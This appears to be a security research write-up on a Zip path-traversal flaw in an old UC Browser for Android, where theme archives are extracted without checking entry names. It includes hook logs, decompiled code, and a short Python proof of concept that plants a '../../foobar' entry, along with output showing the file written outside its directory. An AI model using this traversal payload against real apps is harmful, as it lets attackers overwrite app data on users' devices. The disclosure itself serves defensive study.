UC Browser: Thoughts on ZipInputStream
Summary
To those who don't know it, ZipInputStream is just as disappointing as Armageddon (the movie: The End of the World!).
Insecure processing of zip files with ZipInputStream can hand final control of the device to an attacker: a crafted entry name lets the attacker traverse out of the extraction directory and write arbitrary data. However, today I am not going to talk about how to use ZipInputStream correctly. If you are interested, take some time to read "Safely extract files from ZipInputStream".
We should also be careful of the code-reuse problem, which I call "stack overflow syndrome": https://gist.github.com/shengoo/11240519. By now more and more developers have run into ZipInputStream mistakes, leading to an endless stream of bugs. Today we will look at one of them in the UC Browser!
UC Browser for Android
In an old version of UC Browser, a feature allows users to download and apply a theme. Everyone should be familiar with this process. The theme file itself has a custom extension, "uct", but in fact it is a Zip archive.
[~/R&D/uc-browser]> file Deep-Midnight.uct
Deep-Midnight.uct: Zip archive data, at least v1.0 to extract
A theme file is downloaded by the UC Browser, stored on external storage, and then copied into the browser's data directory. I already know what you are going to say: these files are indeed downloaded through the browser over HTTP. However, note that the browser also has a function to import a theme from local storage.
With the hooking tool, we can find where the theme-processing code extracts and applies the contents of the Zip file:
I/Xposed ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getInputStream : zipEntry : Orange-Popsicle/config.cfg
I/Xposed ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getInputStream : StackTrace : com.uc.framework.c.ai : a
I/Xposed ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getInputStream : StackTrace : com.uc.browser.core.skinmgmt.aa : e
I/Xposed ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getInputStream : StackTrace : com.uc.browser.core.skinmgmt.aa : handleMessage
Now we can use this information together with Lobotomy's surgical API to statically confirm a possible bug:
I/Xposed ( 4803): com.UCMobile.intl : java.util.zip.ZipInputStream : getNextEntry : Hooked!
I/Xposed ( 4803): com.UCMobile.intl : java.util.zip.ZipInputStream : getNextEntry : zipEntry : Orange-Popsicle/color.xml
I/Xposed ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getNextEntry : StackTrace : com.uc.framework.c.ak : a
I/Xposed ( 4803): com.UCMobile.intl : java.util.zip.ZipFile : getNextEntry : StackTrace : com.uc.framework.c.ai : a
......
v0 = v4.append(v0).append("config.cfg").toString();
v4 = new java.util.zip.ZipFile(p11);
v0 = v4.getEntry(v0);
if(v0 != 0) {
    v7 = v4.getInputStream(v0);
} else {
    v7 = 0;
}
......
In short, the UC Browser uses getNextEntry() to walk every file in the Zip archive and writes each one to the corresponding location under /data/data/com.UCMobile.intl/downTheme/theme/Orange-Popsicle/.
There is absolutely no validation of the Zip entry names here.
root@hammerhead:/data/data/com.UCMobile.intl/downTheme/theme/Orange-Popsicle # ls -la
-rw------- u0_a76   u0_a76       4736 2015-11-12 14:57 color.xml
-rw------- u0_a76   u0_a76        317 2015-11-12 14:57 config.cfg
From here, attackers can exploit this vulnerability from several different angles. Through a man-in-the-middle attack they can inject a malicious theme file into the HTTP response of the download function. They can also trick users into downloading a malicious theme and wait for them to apply it locally.
First, we inject a path-traversal entry into the Zip file and then put the file on the device:
import zipfile
import sys

if __name__ == "__main__":
    try:
        # open the existing theme archive in append mode
        zipFile = zipfile.ZipFile(sys.argv[1], "a", zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo(sys.argv[1])
        # add an entry whose name climbs out of the extraction directory
        zipFile.writestr("../../foobar", "foobar")
        zipFile.close()
    except IOError as e:
        raise e

[~/R&D/uc-browser]> python zip_inject.py Deep-Midnight.uct
[~/R&D/uc-browser]> unzip -l Deep-Midnight.uct
......
      616  01-21-15 15:27   Deep-Midnight/drawable/webAppFullScreenBtnIcon.png
     2848  01-21-15 15:27   Deep-Midnight/drawable/window_1.png
     1368  01-21-15 15:27   Deep-Midnight/drawable/window_1_patchdrawable.xml
        6  11-12-15 15:30   ../../foobar
Once this theme file is selected and applied from external storage, we can see that the data has been written successfully.
root@hammerhead:/data/data/com.UCMobile.intl # ls
StartedFlagFile
UCMobile
app_external
app_webview
bannerimages
cache
com
coredata
crash
databases
downTheme
downWallpaper
files
foobar    <- Success!
lib
scrollParams.config
searchimages
shared_prefs
stats_offline
user
wa
Conclusion
The cause of these bugs is that the Zip contents are not validated. In most cases developers simply assume by default that a Zip file will not be tampered with, so they never consider the consequences of a crafted entry name.